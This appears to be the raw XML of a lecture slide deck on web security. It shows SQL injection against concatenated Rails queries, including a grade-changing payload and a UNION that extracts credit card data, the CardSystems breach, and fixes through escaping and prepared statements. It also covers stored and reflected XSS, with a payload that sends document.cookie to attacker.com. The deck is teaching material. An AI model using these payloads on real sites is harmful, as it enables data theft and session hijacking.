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9" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="258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6E52C6-BC49-4E06-8AAB-1AE1023D96B3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2" rIns="91421" bIns="45712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83110D5-8940-48F8-A83D-A5029E6C951E}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr algn="r"/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21" tIns="45712" rIns="91421" bIns="4571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4A480691-AD52-40D9-85DF-C056B1E23545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Unsafe Server Code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74993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advisorName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[:form][:advisor]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students = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Student.find_by_sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty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students.*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"FROM students, advisors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"AND advisor.name = '" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>advisorName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + "'");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762000" y="4403725"/>
            <a:ext cx="6432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students.* FROM students, advisors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advisor.name = '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Jones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3079" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="736600" y="3810000"/>
            <a:ext cx="208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Typical query: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80866" y="5715000"/>
            <a:ext cx="229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Value from form field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881966" y="5331417"/>
            <a:ext cx="891153" cy="565688"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 891153 w 891153"/>
              <a:gd name="connsiteY0" fmla="*/ 565688 h 565688"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 891153"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 565688"/>
              <a:gd name="connsiteX0" fmla="*/ 891153 w 891153"/>
              <a:gd name="connsiteY0" fmla="*/ 565688 h 565688"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 891153"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 565688"/>
              <a:gd name="connsiteX0" fmla="*/ 891153 w 891153"/>
              <a:gd name="connsiteY0" fmla="*/ 565688 h 565688"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 891153"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 56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1153" h="565688">
                <a:moveTo>
                  <a:pt x="891153" y="565688"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="59410" y="547606"/>
                  <a:pt x="25831" y="459783"/>
                  <a:pt x="0" y="0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69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D076E5D-E36F-4191-8F79-5A1889623C58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Injection Attack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762000" y="1447800"/>
            <a:ext cx="46037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Jones';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UPDATE grades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SET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>g.grade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 4.0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grades g, students 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g.student_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = s.id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s.name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'Smith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762000" y="3886200"/>
            <a:ext cx="64325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students.* FROM students, advisors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advisor.name = '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Jones';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UPDATE grades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SET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g.grade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4.0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FROM grades g, students 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g.student_id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s.id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AND s.name = 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'Smith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'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36600" y="3429000"/>
            <a:ext cx="2389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Resulting query:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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736600" y="990600"/>
            <a:ext cx="6418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Enter the following in the "Advisor name" field:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392978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432A0BA-6389-456B-93DA-2E452B6B697E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Stealing Private Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5125" name="Picture 4" descr="sqlInject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487680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9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60442B3-7B5C-402A-B493-10894774EFDA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Stealing Private Info, cont'd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762000" y="1508125"/>
            <a:ext cx="73469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month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[:form][:month]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orders = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Orders.find_by_sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty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pizza, toppings, quantity, date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"FROM orders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"WHERE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=" +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 +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    "AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>order_month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=" + month);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762000" y="4403725"/>
            <a:ext cx="76517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October </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"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latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>card_num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"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exp_mon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> as quantity, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exp_year</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> as date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FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>credit_cards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r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736600" y="3810000"/>
            <a:ext cx="2668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What if "month" is:</a:t>
            </a:r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736600" y="990600"/>
            <a:ext cx="2760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Server query code:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141868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8735C94-0AF5-4F45-AEA4-B3508D7C4221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Resulting Query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765175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pizza, toppings, quantity, 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orders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=94412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AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>order_month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=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October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card_num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exp_mon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quantity,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exp_year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date</a:t>
            </a:r>
            <a:b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</a:b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FROM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credit_cards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1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6890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728D924-F23B-41B1-80E0-BE7925247B28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Resulting Query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765175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pizza, toppings, quantity, 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orders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=94412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AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>order_month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=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October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card_num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exp_mon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quantity,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exp_year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date</a:t>
            </a:r>
            <a:b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</a:b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FROM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credit_cards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49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505200"/>
            <a:ext cx="6615800" cy="316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4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CardSystems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Credit card payment processing company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SQL injection attack in June 2005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Attack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Credit card #s stored unencrypted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263,000 credit card #s stolen from database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43 million credit card #s exposed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921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4D428D7-8CD3-473C-AE81-BC2BDABC9467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dirty="0" err="1" smtClean="0"/>
              <a:t>CardSystems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Attack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59DF168-6DA3-4581-8209-F7205E3ACD49}" type="slidenum">
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92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6550"/>
            <a:ext cx="13970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50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DB698A2-474C-4409-BCA0-C8817AD36F96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Let Rails Handle SQL Escaping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62000" y="1584325"/>
            <a:ext cx="7263527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Student.find_by_sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("SELECT students.* " +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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FROM students, advisors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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AND advisor.name =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?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>",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[:form][:advisor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]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)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3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DB698A2-474C-4409-BCA0-C8817AD36F96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Prepared Statements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62000" y="1584325"/>
            <a:ext cx="74993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$statement = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>odbc_prepare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($connection,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* FROM students " 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"WHERE advisor = ? AND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&gt;= ?;");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odbc_execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($statement, array($advisor, $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));</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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762000" y="3870325"/>
            <a:ext cx="6280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</a:rPr>
              <a:t>statement = connection.prepareStatement(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    "SELECT * FROM students " +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    "WHERE advisor = ? AND gpa &gt;= ?;");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statement.setString(1, advisor);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statement.setString(2, gpa);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ResultSet rs = statement.executeQuery();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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762000" y="3429000"/>
            <a:ext cx="91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Java:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10248" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="114300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PHP:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93152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C15B2E4-1FA9-416B-A769-D72FD60CB138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Stored XSS Attack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457200" y="1385888"/>
            <a:ext cx="541686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&lt;div class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blogComment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean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&lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>comment.message.html_safe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</a:rPr>
              <a:t>div&gt;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4175125"/>
            <a:ext cx="803296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I agree completely with Alice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style="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display:none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" id="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"&gt;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document.getElementById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img.src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"http://attacker.com?cookie="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encodeURIComponent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document.cookie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3928818" y="2819400"/>
            <a:ext cx="1633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folHlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No escaping!</a:t>
            </a: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 flipV="1">
            <a:off x="4740943" y="2450068"/>
            <a:ext cx="0" cy="445532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457200" y="3733800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chemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacking blog entry:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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457200" y="1066800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Buggy server template:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295713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1128177-3609-4AA7-BC62-9C024B934194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Reflected XSS Attack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457200" y="1843088"/>
            <a:ext cx="757130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&lt;h1&gt;Search Results&lt;/h1&gt;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Results for &lt;%=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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>searchTerm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html_safe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5910018" y="3352800"/>
            <a:ext cx="1633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folHlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No escaping!</a:t>
            </a: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 flipV="1">
            <a:off x="6722142" y="2909888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457200" y="1443038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Buggy server template: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57200" y="4001631"/>
            <a:ext cx="772519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Justin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Bieber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style="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display:none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" id="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"&gt;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document.getElementById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img.src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"http://attacker.com?cookie="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encodeURIComponent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document.cookie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57200" y="3560306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Attacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entry:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82251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11581</TotalTime>
  <Words>672</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>139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Unsafe Server Code</vt:lpstr>
      <vt:lpstr>Injection Attack</vt:lpstr>
      <vt:lpstr>Stealing Private Information</vt:lpstr>
      <vt:lpstr>Stealing Private Info, cont'd</vt:lpstr>
      <vt:lpstr>Resulting Query</vt:lpstr>
      <vt:lpstr>Resulting Query</vt:lpstr>
      <vt:lpstr>CardSystems Attack</vt:lpstr>
      <vt:lpstr>Let Rails Handle SQL Escaping</vt:lpstr>
      <vt:lpstr>Prepared Statements</vt:lpstr>
      <vt:lpstr>Stored XSS Attack</vt:lpstr>
      <vt:lpstr>Reflected XSS Attack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451</cp:revision>
  <cp:lastPrinted>2011-01-25T21:54:55Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-10-19T02:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-05-29T18:23:22Z</dcterms:modified>
</cp:coreProperties>
</file>